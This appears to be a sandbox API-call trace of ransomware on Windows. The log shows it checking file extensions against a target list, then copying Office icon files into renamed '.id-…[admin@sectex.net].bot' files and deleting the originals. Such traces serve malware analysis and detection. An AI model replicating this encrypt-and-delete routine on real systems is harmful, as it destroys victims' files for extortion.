	[0171.133] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString=".1cd") returned 4
	[0171.133] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString=".jpg") returned 4
	[0171.133] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString=".doc") returned 4
	[0171.133] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.133] lstrlenW (lpString=".docx") returned 5
	[0171.133] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1
	[0171.133] lstrlenW (lpString=".pdf") returned 4
	[0171.133] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.133] lstrlenW (lpString=".xls") returned 4
	[0171.133] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.133] lstrlenW (lpString=".xlsx") returned 5
	[0171.133] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1
	[0171.133] lstrlenW (lpString=".ppt") returned 4
	[0171.133] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString=".zip") returned 4
	[0171.133] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.133] lstrlenW (lpString=".rar") returned 4
	[0171.133] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.133] lstrlenW (lpString=".bz2") returned 4
	[0171.133] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.133] lstrlenW (lpString=".7z") returned 3
	[0171.133] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString=".dbf") returned 4
	[0171.134] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.134] lstrlenW (lpString=".1cd") returned 4
	[0171.134] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.134] lstrlenW (lpString=".jpg") returned 4
	[0171.134] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.134] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0171.134] lstrlenW (lpString="INCOMING.ICO") returned 12
	[0171.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.145] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1718) returned 1
	[0171.145] CloseHandle (hObject=0x3e8) returned 1
	[0171.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico")) returned 0x20
	[0171.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.146] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.146] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370
	[0171.146] GetLastError () returned 0x0
	[0171.146] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x6b6, lpOverlapped=0x0) returned 1
	[0171.150] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x6c0, lpOverlapped=0x0) returned 1
	[0171.151] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.151] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.152] SetEndOfFile (hFile=0x370) returned 1
	[0171.152] CloseHandle (hObject=0x370) returned 1
	[0171.152] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.152] SetEndOfFile (hFile=0x3e8) returned 1
	[0171.154] CloseHandle (hObject=0x3e8) returned 1
	[0171.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.154] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico")) returned 1
	[0171.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.155] lstrlenW (lpString=".doc") returned 4
	[0171.155] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.155] lstrlenW (lpString=".docx") returned 5
	[0171.155] lstrcmpiW (lpString1=".docx", lpString2="G.ICO") returned -1
	[0171.155] lstrlenW (lpString=".pdf") returned 4
	[0171.155] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.155] lstrlenW (lpString=".xls") returned 4
	[0171.155] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.155] lstrlenW (lpString=".xlsx") returned 5
	[0171.155] lstrcmpiW (lpString1=".xlsx", lpString2="G.ICO") returned -1
	[0171.155] lstrlenW (lpString=".ppt") returned 4
	[0171.155] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.155] lstrlenW (lpString=".zip") returned 4
	[0171.155] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.155] lstrlenW (lpString=".rar") returned 4
	[0171.155] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.155] lstrlenW (lpString=".bz2") returned 4
	[0171.155] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.155] lstrlenW (lpString=".7z") returned 3
	[0171.155] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.155] lstrlenW (lpString=".dbf") returned 4
	[0171.155] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.155] lstrlenW (lpString=".1cd") returned 4
	[0171.155] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.155] lstrlenW (lpString=".jpg") returned 4
	[0171.155] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.156] lstrlenW (lpString=".doc") returned 4
	[0171.156] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.156] lstrlenW (lpString=".docx") returned 5
	[0171.156] lstrcmpiW (lpString1=".docx", lpString2="G.ICO") returned -1
	[0171.156] lstrlenW (lpString=".pdf") returned 4
	[0171.156] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.156] lstrlenW (lpString=".xls") returned 4
	[0171.156] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.156] lstrlenW (lpString=".xlsx") returned 5
	[0171.156] lstrcmpiW (lpString1=".xlsx", lpString2="G.ICO") returned -1
	[0171.156] lstrlenW (lpString=".ppt") returned 4
	[0171.156] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.156] lstrlenW (lpString=".zip") returned 4
	[0171.156] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.156] lstrlenW (lpString=".rar") returned 4
	[0171.156] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.156] lstrlenW (lpString=".bz2") returned 4
	[0171.156] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.156] lstrlenW (lpString=".7z") returned 3
	[0171.156] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.156] lstrlenW (lpString=".dbf") returned 4
	[0171.156] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.156] lstrlenW (lpString=".1cd") returned 4
	[0171.156] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO") returned 72
	[0171.156] lstrlenW (lpString=".jpg") returned 4
	[0171.156] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.157] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0171.157] lstrlenW (lpString="INDOMAIN.ICO") returned 12
	[0171.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.157] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=318) returned 1
	[0171.157] CloseHandle (hObject=0x3e8) returned 1
	[0171.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico")) returned 0x20
	[0171.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.158] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.158] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370
	[0171.158] GetLastError () returned 0x0
	[0171.158] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0171.159] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0171.160] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.160] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.160] SetEndOfFile (hFile=0x370) returned 1
	[0171.160] CloseHandle (hObject=0x370) returned 1
	[0171.160] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.160] SetEndOfFile (hFile=0x3e8) returned 1
	[0171.163] CloseHandle (hObject=0x3e8) returned 1
	[0171.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico")) returned 1
	[0171.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.164] lstrlenW (lpString=".doc") returned 4
	[0171.164] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.164] lstrlenW (lpString=".docx") returned 5
	[0171.164] lstrcmpiW (lpString1=".docx", lpString2="N.ICO") returned -1
	[0171.164] lstrlenW (lpString=".pdf") returned 4
	[0171.164] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.164] lstrlenW (lpString=".xls") returned 4
	[0171.164] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.164] lstrlenW (lpString=".xlsx") returned 5
	[0171.164] lstrcmpiW (lpString1=".xlsx", lpString2="N.ICO") returned -1
	[0171.164] lstrlenW (lpString=".ppt") returned 4
	[0171.164] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.164] lstrlenW (lpString=".zip") returned 4
	[0171.164] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.164] lstrlenW (lpString=".rar") returned 4
	[0171.164] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.164] lstrlenW (lpString=".bz2") returned 4
	[0171.164] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.165] lstrlenW (lpString=".7z") returned 3
	[0171.165] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.165] lstrlenW (lpString=".dbf") returned 4
	[0171.165] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.165] lstrlenW (lpString=".1cd") returned 4
	[0171.165] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.165] lstrlenW (lpString=".jpg") returned 4
	[0171.165] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.165] lstrlenW (lpString=".doc") returned 4
	[0171.165] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.165] lstrlenW (lpString=".docx") returned 5
	[0171.165] lstrcmpiW (lpString1=".docx", lpString2="N.ICO") returned -1
	[0171.165] lstrlenW (lpString=".pdf") returned 4
	[0171.165] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.165] lstrlenW (lpString=".xls") returned 4
	[0171.165] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.165] lstrlenW (lpString=".xlsx") returned 5
	[0171.165] lstrcmpiW (lpString1=".xlsx", lpString2="N.ICO") returned -1
	[0171.165] lstrlenW (lpString=".ppt") returned 4
	[0171.165] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.165] lstrlenW (lpString=".zip") returned 4
	[0171.165] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.165] lstrlenW (lpString=".rar") returned 4
	[0171.165] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.165] lstrlenW (lpString=".bz2") returned 4
	[0171.165] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.165] lstrlenW (lpString=".7z") returned 3
	[0171.166] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.166] lstrlenW (lpString=".dbf") returned 4
	[0171.166] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.166] lstrlenW (lpString=".1cd") returned 4
	[0171.166] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO") returned 72
	[0171.166] lstrlenW (lpString=".jpg") returned 4
	[0171.166] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.166] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0171.166] lstrlenW (lpString="MAIL.ICO") returned 8
	[0171.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.167] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2606) returned 1
	[0171.167] CloseHandle (hObject=0x3e8) returned 1
	[0171.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico")) returned 0x20
	[0171.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.167] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.167] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370
	[0171.168] GetLastError () returned 0x0
	[0171.168] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xa2e, lpOverlapped=0x0) returned 1
	[0171.275] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xa30, lpOverlapped=0x0) returned 1
	[0171.277] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.277] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0171.277] SetEndOfFile (hFile=0x370) returned 1
	[0171.679] CloseHandle (hObject=0x370) returned 1
	[0171.679] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.679] SetEndOfFile (hFile=0x3e8) returned 1
	[0171.701] CloseHandle (hObject=0x3e8) returned 1
	[0171.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico")) returned 1
	[0171.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.702] lstrlenW (lpString=".doc") returned 4
	[0171.702] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.702] lstrlenW (lpString=".docx") returned 5
	[0171.702] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0171.702] lstrlenW (lpString=".pdf") returned 4
	[0171.702] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.702] lstrlenW (lpString=".xls") returned 4
	[0171.702] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.702] lstrlenW (lpString=".xlsx") returned 5
	[0171.702] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0171.702] lstrlenW (lpString=".ppt") returned 4
	[0171.702] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.702] lstrlenW (lpString=".zip") returned 4
	[0171.702] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.703] lstrlenW (lpString=".rar") returned 4
	[0171.703] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.703] lstrlenW (lpString=".bz2") returned 4
	[0171.703] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.703] lstrlenW (lpString=".7z") returned 3
	[0171.703] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
